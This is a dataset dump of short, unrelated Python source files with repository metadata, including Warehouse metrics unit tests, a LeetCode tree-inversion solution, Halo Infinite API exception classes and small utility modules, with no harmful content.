tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 6,709
|
2015-01-05T01:23:20.000Z
|
2022-03-31T14:49:46.000Z
|
tests/unit/metrics/test_views.py
|
fairhopeweb/warehouse
|
7d8ef742e8fe6b401190c28ce56761848041c89f
|
[
"Apache-2.0"
] | 959
|
2015-01-12T22:22:40.000Z
|
2022-03-31T22:21:51.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
import pytest
from warehouse.metrics import views
class TestTimingView:
@pytest.mark.parametrize("route", [None, "foo"])
def test_unknown_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(original_view=pretend.stub())
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:unknown"])
]
@pytest.mark.parametrize("route", [None, "foo"])
def test_qualname_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(
original_view=pretend.stub(
__module__="foo", __qualname__="bar", __name__="other"
)
)
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:foo.bar"])
]
@pytest.mark.parametrize("route", [None, "foo"])
def test_name_view(self, pyramid_services, metrics, route):
response = pretend.stub()
view = pretend.call_recorder(lambda request, context: response)
view_info = pretend.stub(
original_view=pretend.stub(__module__="foo", __name__="other")
)
derived = views.timing_view(view, view_info)
request = pretend.stub(
matched_route=pretend.stub(name=route) if route else None,
find_service=pyramid_services.find_service,
)
context = pretend.stub()
route_tag = "route:null" if route is None else f"route:{route}"
assert derived(context, request) is response
assert view.calls == [pretend.call(context, request)]
assert metrics.timed.calls == [
pretend.call("pyramid.view.duration", tags=[route_tag, "view:foo.other"])
]
| 37.384615
| 85
| 0.65726
| 415
| 3,402
| 5.238554
| 0.262651
| 0.091076
| 0.044158
| 0.035879
| 0.75345
| 0.75345
| 0.75345
| 0.75345
| 0.698252
| 0.698252
| 0
| 0.001541
| 0.236919
| 3,402
| 90
| 86
| 37.8
| 0.835901
| 0.151969
| 0
| 0.622951
| 0
| 0
| 0.074139
| 0.021928
| 0
| 0
| 0
| 0
| 0.147541
| 1
| 0.04918
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c79577f872548a5d5886526761ff4851196704e
| 59
|
py
|
Python
|
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
hwt/synthesizer/__init__.py
|
mgielda/hwt
|
e6c699fb154f93ac03523bfe40a3d4fc1912d28b
|
[
"MIT"
] | null | null | null |
"""
Sythesizer converts Unit instances to HDL objects.
"""
| 14.75
| 50
| 0.728814
| 7
| 59
| 6.142857
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 59
| 3
| 51
| 19.666667
| 0.86
| 0.847458
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
1c8935e8e91733a5abdff56316f774bca0712f8c
| 127
|
py
|
Python
|
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | 1
|
2021-11-22T18:24:19.000Z
|
2021-11-22T18:24:19.000Z
|
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | null | null | null |
hornero/__init__.py
|
santisoler/hornero
|
7eb0c32625e00b858e34c87633c8c3c4618dc40a
|
[
"MIT"
] | null | null | null |
"""
Hornero: A package selector for building your comfy nest.
"""
from . import _version
__version__ = f"v{_version.version}"
| 18.142857
| 57
| 0.732283
| 17
| 127
| 5.117647
| 0.823529
| 0.321839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149606
| 127
| 6
| 58
| 21.166667
| 0.805556
| 0.448819
| 0
| 0
| 0
| 0
| 0.306452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
1c8fddc8b884c7668e38237571aace14327a4029
| 1,517
|
py
|
Python
|
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | 2
|
2022-02-06T04:59:08.000Z
|
2022-02-09T18:18:48.000Z
|
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | null | null | null |
haloinfinite/exceptions.py
|
ingmferrer/haloinfinite
|
9d85f775129148d0226ff416c574aa619c290246
|
[
"MIT"
] | null | null | null |
class BaseError(Exception):
pass
class UserTokenRequiredError(BaseError):
pass
class XboxUserTokenRequiredError(BaseError):
pass
class XstsXboxTokenRequiredError(BaseError):
pass
class XstsHaloTokenRequiredError(BaseError):
pass
class SpartanTokenRequiredError(BaseError):
pass
class ClearanceTokenRequiredError(BaseError):
pass
class TokenExpiredError(BaseError):
pass
class UnknownError(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnauthorizedError(BaseError):
pass
class ForbiddenError(BaseError):
pass
class NotFoundError(BaseError):
pass
class MethodNotAllowedError(BaseError):
pass
class NotAcceptableError(BaseError):
pass
class ConflictError(BaseError):
pass
class GoneError(BaseError):
pass
class LengthRequiredError(BaseError):
pass
class PreconditionFailedError(BaseError):
pass
class RequestEntityTooLargeError(BaseError):
pass
class UnsupportedMediaTypeError(BaseError):
pass
class RequestedRangeNotSatisfiableError(BaseError):
pass
class UnprocessableEntityError(BaseError):
pass
class TooManyRequestsError(BaseError):
pass
class InternalServerErrorError(BaseError):
pass
class NotImplementedAPIError(BaseError):
pass
class ServiceUnavailableError(BaseError):
pass
class GatewayTimeoutError(BaseError):
pass
class InsufficientStorageError(BaseError):
pass
class BandwidthLimitExceededError(BaseError):
pass
| 12.747899
| 51
| 0.764008
| 120
| 1,517
| 9.658333
| 0.275
| 0.225194
| 0.434858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.176664
| 1,517
| 118
| 52
| 12.855932
| 0.927942
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 4
|
98ea0799ea7742f077d8c48d8a9462b6d17c0b0b
| 238
|
py
|
Python
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 23
|
2015-08-03T23:28:54.000Z
|
2018-12-12T20:11:45.000Z
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 1
|
2018-09-30T18:18:24.000Z
|
2018-09-30T18:18:24.000Z
|
byceps/blueprints/api/v1/views.py
|
homeworkprod/byceps
|
cd0f9f37f7b5eb517106ec761acc7e0bdf75e22e
|
[
"BSD-3-Clause"
] | 9
|
2015-08-06T16:41:36.000Z
|
2018-09-25T11:17:31.000Z
|
"""
byceps.blueprints.api.v1.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from flask import Blueprint
blueprint = Blueprint('v1', __name__)
| 18.307692
| 54
| 0.651261
| 26
| 238
| 5.807692
| 0.846154
| 0.238411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 0.117647
| 238
| 12
| 55
| 19.833333
| 0.671429
| 0.672269
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
|
0
| 4
|
c70627cb60718bb1d01ad43d527256723bb0ead0
| 158
|
py
|
Python
|
lib/galaxy/util/log/__init__.py
|
ramezrawas/galaxy-1
|
c03748dd49c060a68d07bce56eae33e0ba154414
|
[
"CC-BY-3.0"
] | 6
|
2018-11-03T22:43:35.000Z
|
2022-02-15T17:51:33.000Z
|
lib/galaxy/util/log/__init__.py
|
igorhollaender/OBSOLETE_sirv_dashboard
|
85aec60b80ef6f561d89398e3da5963d3d0f2aa4
|
[
"CC-BY-3.0"
] | 7
|
2016-12-07T22:19:37.000Z
|
2019-01-30T15:04:26.000Z
|
lib/galaxy/util/log/__init__.py
|
igorhollaender/OBSOLETE_sirv_dashboard
|
85aec60b80ef6f561d89398e3da5963d3d0f2aa4
|
[
"CC-BY-3.0"
] | 10
|
2017-04-10T21:40:22.000Z
|
2022-02-21T16:50:10.000Z
|
class TraceLogger( object ):
def __init__( self, name ):
self.name = name
def log( **kwargs ):
raise TypeError( "Abstract Method" )
| 19.75
| 44
| 0.588608
| 17
| 158
| 5.235294
| 0.764706
| 0.179775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.297468
| 158
| 7
| 45
| 22.571429
| 0.801802
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c722f84eaa456f148c71ca46fda31f179c84c807
| 194
|
py
|
Python
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 166
|
2019-10-08T09:26:42.000Z
|
2022-03-29T22:27:30.000Z
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 17
|
2019-12-18T02:07:13.000Z
|
2022-03-04T06:40:54.000Z
|
utils/time_util.py
|
gregbugaj/TextGenerator
|
d92431bdce31914a108417f7b00ed80b8f994298
|
[
"MIT"
] | 47
|
2019-11-24T08:04:20.000Z
|
2022-03-23T00:43:33.000Z
|
from datetime import datetime
def today():
time = datetime.now()
return time.strftime("%Y%m%d")
def timestamp():
time = datetime.now()
return time.strftime("%Y%m%d%H%M%S%f")
| 16.166667
| 42
| 0.628866
| 30
| 194
| 4.066667
| 0.533333
| 0.196721
| 0.245902
| 0.344262
| 0.590164
| 0.590164
| 0.590164
| 0.590164
| 0.590164
| 0
| 0
| 0
| 0.195876
| 194
| 11
| 43
| 17.636364
| 0.782051
| 0
| 0
| 0.285714
| 0
| 0
| 0.103093
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c7274492c1f1ca99699a6e6e50e02a211a7cd725
| 110
|
py
|
Python
|
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | 3
|
2020-03-03T19:58:02.000Z
|
2021-11-02T08:22:22.000Z
|
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | null | null | null |
rainforest/common/__init__.py
|
gugerlir/rainforest
|
85a9d51acf2036245f0cebf7232e735c2cf2dfc4
|
[
"BSD-3-Clause"
] | 5
|
2020-03-25T15:25:25.000Z
|
2021-06-11T22:15:58.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 8 16:07:04 2018
@author: wolfensb
"""
| 13.75
| 35
| 0.6
| 18
| 110
| 3.666667
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.144444
| 0.181818
| 110
| 7
| 36
| 15.714286
| 0.588889
| 0.890909
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c73765f456b8eca666b221dc591c42583c4f30be
| 105
|
py
|
Python
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 3
|
2021-03-03T21:02:11.000Z
|
2021-05-14T09:24:40.000Z
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 8
|
2021-06-25T22:54:53.000Z
|
2021-08-09T10:07:30.000Z
|
tests/exporting/__init__.py
|
MyPyDavid/raman_fitting
|
a827ab578ae801e185384159f145ae4dfad39549
|
[
"MIT"
] | 2
|
2021-07-08T09:49:49.000Z
|
2022-03-19T14:43:01.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 28 09:04:40 2021
@author: zmg
"""
| 13.125
| 35
| 0.590476
| 18
| 105
| 3.444444
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 0.180952
| 105
| 7
| 36
| 15
| 0.55814
| 0.885714
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c73aa8b42f03927cae156ec60827e9be41935e75
| 128
|
py
|
Python
|
run.py
|
cwvanharen/bnbot
|
ed9c6ddec817fbc35ee12a7984acf36ada10ebd1
|
[
"MIT"
] | 2
|
2016-08-24T12:15:46.000Z
|
2018-08-08T09:24:49.000Z
|
run.py
|
AWSGovardhan/iris-app
|
ad5aad4371c34b10ac31eefc7a4ccf262095c2a8
|
[
"MIT"
] | null | null | null |
run.py
|
AWSGovardhan/iris-app
|
ad5aad4371c34b10ac31eefc7a4ccf262095c2a8
|
[
"MIT"
] | 2
|
2016-04-05T01:49:45.000Z
|
2016-08-24T12:15:52.000Z
|
#!/usr/bin/env python
from app import app as application
if __name__ == '__main__':
application.run(port=9000, debug=True)
| 21.333333
| 42
| 0.726563
| 19
| 128
| 4.473684
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036697
| 0.148438
| 128
| 5
| 43
| 25.6
| 0.743119
| 0.15625
| 0
| 0
| 0
| 0
| 0.074766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
c767fc157295d6a65e7106817d5af97c8fc628cc
| 86
|
py
|
Python
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | 1
|
2018-08-20T16:36:40.000Z
|
2018-08-20T16:36:40.000Z
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | 3
|
2018-08-23T13:25:47.000Z
|
2018-08-23T15:59:45.000Z
|
xclim/data/__init__.py
|
Ouranosinc/dcvar
|
0737c66a36f8969e7a17276990bc7e76f7b410c4
|
[
"Apache-2.0"
] | null | null | null |
"""JSON and YAML definitions for virtual modules and internationalisation support."""
| 43
| 85
| 0.802326
| 10
| 86
| 6.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116279
| 86
| 1
| 86
| 86
| 0.907895
| 0.918605
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c76dd3fa81cc2ee16f6e95ceaef5ef446e63422b
| 895
|
py
|
Python
|
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
src/q226-invert-binary-tree.py
|
jiaju-yang/leetcode
|
3af140a334c7d5457b64ae8813ddba284c66e57f
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=226 lang=python3
#
# [226] Invert Binary Tree
#
from .tree_tools import *
from typing import Optional
# @lc code=start
class Solution:
def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:
return self.dfs(root)
def dfs(self, node):
if not node:
return
node.left, node.right = self.dfs(node.right), self.dfs(node.left)
return node
# @lc code=end
solve = Solution().invertTree
def test_default():
assert solve(construct_tree([4, 2, 7, 1, 3, 6, 9])
) == construct_tree([4, 7, 2, 9, 6, 3, 1])
assert solve(construct_tree([2, 1, 3])) == construct_tree([2, 3, 1])
def test_corner_cases():
assert solve(construct_tree([])) == construct_tree([])
assert solve(construct_tree([1])) == construct_tree([1])
assert not solve(construct_tree([1])) == construct_tree([2])
| 24.189189
| 73
| 0.627933
| 126
| 895
| 4.349206
| 0.365079
| 0.237226
| 0.164234
| 0.175182
| 0.182482
| 0.116788
| 0
| 0
| 0
| 0
| 0
| 0.044286
| 0.217877
| 895
| 36
| 74
| 24.861111
| 0.738571
| 0.099441
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.263158
| 1
| 0.210526
| false
| 0
| 0.105263
| 0.052632
| 0.526316
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c781e4ce149da3a85dae88e0b8d2425d22b9e0c0
| 110
|
py
|
Python
|
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
Oefeningen/standalone/for.py
|
Seviran/Python_3
|
e30ead250129d25bbc0a7ee2f6298775b2f4529a
|
[
"MIT"
] | null | null | null |
for count in range(1,10):
print(count)
print(count * count)
for letter in "coffee":
print(letter)
| 18.333333
| 25
| 0.645455
| 17
| 110
| 4.176471
| 0.529412
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 0.227273
| 110
| 6
| 26
| 18.333333
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 4
|
c7915917cdb6b7e7703853d131223a42385f98be
| 168
|
py
|
Python
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | 1
|
2019-08-22T03:59:27.000Z
|
2019-08-22T03:59:27.000Z
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | 1
|
2018-12-23T14:18:40.000Z
|
2018-12-23T14:18:40.000Z
|
workers/mail_handlers/base_handler.py
|
mmedum/limbo
|
8aff181a1616bc4941b29fcd75e33e7943a105ea
|
[
"MIT"
] | null | null | null |
class BaseHandler:
'''Abstract handler for send emails'''
def send_mail(self, message):
raise NotImplementedError('Not implemented in abstract class')
| 28
| 70
| 0.714286
| 19
| 168
| 6.263158
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196429
| 168
| 5
| 71
| 33.6
| 0.881481
| 0.190476
| 0
| 0
| 0
| 0
| 0.253846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
c79aa5aa747a960bb5fc0e0e1656eb9d01cca3d4
| 137
|
py
|
Python
|
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
src/coffee/__main__.py
|
Coffee2Bits/Coffee
|
e322633cd2fa76e5a9c28e67422a35c2ce98f559
|
[
"MIT"
] | null | null | null |
if sys.argv[0].endswith("__main__.py"):
sys.argv[0] = "coffee"
if __name__ == "__main__":
from aac import cli
cli.run_cli()
| 19.571429
| 39
| 0.627737
| 21
| 137
| 3.47619
| 0.666667
| 0.191781
| 0.219178
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018182
| 0.19708
| 137
| 7
| 40
| 19.571429
| 0.645455
| 0
| 0
| 0
| 0
| 0
| 0.181159
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
c7acccc85b6c77f95d87bc8807297560686f209b
| 169
|
py
|
Python
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 15
|
2019-12-06T16:19:45.000Z
|
2021-08-20T13:22:22.000Z
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 14
|
2020-12-08T10:45:05.000Z
|
2021-09-21T17:23:45.000Z
|
django_gotolong/ftwhl/apps.py
|
ParikhKadam/gotolong
|
839beb8aa37055a2078eaa289b8ae05b62e8905e
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | 9
|
2020-01-01T03:04:29.000Z
|
2021-04-18T08:42:30.000Z
|
from django.apps import AppConfig
from django_gotolong.ftwhl.views import start
class FtwhlConfig(AppConfig):
name = 'ftwhl'
def ready(self):
start()
| 16.9
| 45
| 0.710059
| 21
| 169
| 5.666667
| 0.714286
| 0.168067
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207101
| 169
| 9
| 46
| 18.777778
| 0.88806
| 0
| 0
| 0
| 0
| 0
| 0.029586
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
c7ad833dfcc0011cc0ece42fdedb4bcca4eb49ff
| 90
|
py
|
Python
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
creativemindplus/skybison
|
d1740e08d8de85a0a56b650675717da67de171a0
|
[
"CNRI-Python-GPL-Compatible"
] | 278
|
2021-08-31T00:46:51.000Z
|
2022-02-13T19:43:28.000Z
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
creativemindplus/skybison
|
d1740e08d8de85a0a56b650675717da67de171a0
|
[
"CNRI-Python-GPL-Compatible"
] | 9
|
2021-11-05T22:28:43.000Z
|
2021-11-23T08:39:04.000Z
|
library/test/test_compiler/testcorpus/02_expr_subscr.py
|
tekknolagi/skybison
|
bea8fc2af0a70e7203b4c19f36c14a745512a335
|
[
"CNRI-Python-GPL-Compatible"
] | 12
|
2021-08-31T07:49:54.000Z
|
2021-10-08T01:09:01.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
a[b]
a[b][c]
| 22.5
| 76
| 0.666667
| 16
| 90
| 3.75
| 0.75
| 0.066667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122222
| 90
| 3
| 77
| 30
| 0.759494
| 0.822222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
